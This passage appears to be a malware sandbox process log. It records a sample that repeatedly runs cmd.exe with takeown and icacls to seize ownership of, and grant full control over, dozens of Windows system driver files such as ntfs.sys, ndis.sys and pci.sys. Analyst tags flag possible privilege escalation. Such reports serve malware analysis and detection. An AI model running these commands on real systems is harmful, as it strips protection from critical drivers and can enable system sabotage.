C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:3936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:3712
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:2412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:3668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:3436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵
- Modifies file permissions
PID:3428
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:3424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:3880
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵PID:3892
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:3188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵PID:3348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:3368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:4048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:3712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:3232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:3448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:4064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:2968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵PID:3452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:3756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:2292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:1396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:4028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:3892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵
- Possible privilege escalation attempt
PID:3444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:3404
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵PID:3744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:3560
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵PID:2560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:3576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵PID:3840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:4148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:3976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵PID:3900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:3348
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵
- Possible privilege escalation attempt
PID:3552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"3⤵PID:4240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:3596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:3708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:3108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:3768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:3900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"3⤵PID:4216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:3332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵PID:4160
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:4064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:4168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:4120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Possible privilege escalation attempt
PID:4276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:4308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:4180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:4348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵PID:4408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:4224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:4416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:4472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:4296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:4436
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:4492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:4356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵PID:4516
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:4572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:4372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:4524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:4424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵
- Modifies file permissions
PID:4604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:4484
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:4624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:4540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:4724
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:4580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵PID:4680
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:4752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:4652
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:4808
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:4696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:4816
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:4768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:4856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵PID:4920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:4828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵PID:4932
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:4868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵PID:4980
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:4948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:5048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:5096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:4972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"3⤵PID:5104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:5040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵PID:4104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:5112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:3160
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"3⤵PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:772
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵PID:4192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"3⤵PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:3420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵
- Possible privilege escalation attempt
PID:4276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"3⤵PID:4252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:3924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:4220
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:4212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:4416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"3⤵PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:4060
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:4332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:4116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:4420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"3⤵PID:4452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:4196
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"3⤵
- Modifies file permissions
PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:4352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵PID:4524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:4256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵PID:4712
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"3⤵PID:4732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:4548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:4736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"3⤵PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:4592
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵PID:4760
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:4600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:4612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"3⤵PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:4628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵PID:4840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:4680
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciide.sys3⤵PID:4860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:4776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciidex.sys3⤵
- Possible privilege escalation attempt
PID:4876
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"3⤵PID:4964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:4744
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcmcia.sys3⤵
- Modifies file permissions
PID:5060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"3⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:4924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcw.sys3⤵
- Possible privilege escalation attempt
PID:5036
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"3⤵PID:5100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit2⤵PID:4936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\PEAuth.sys3⤵
- Modifies file permissions
PID:3088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"3⤵PID:3108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit2⤵PID:4832
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\portcls.sys3⤵PID:5012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit2⤵PID:4928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\processr.sys3⤵PID:4172
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"3⤵PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit2⤵PID:3492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql2300.sys3⤵PID:4276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3708
-
-
-
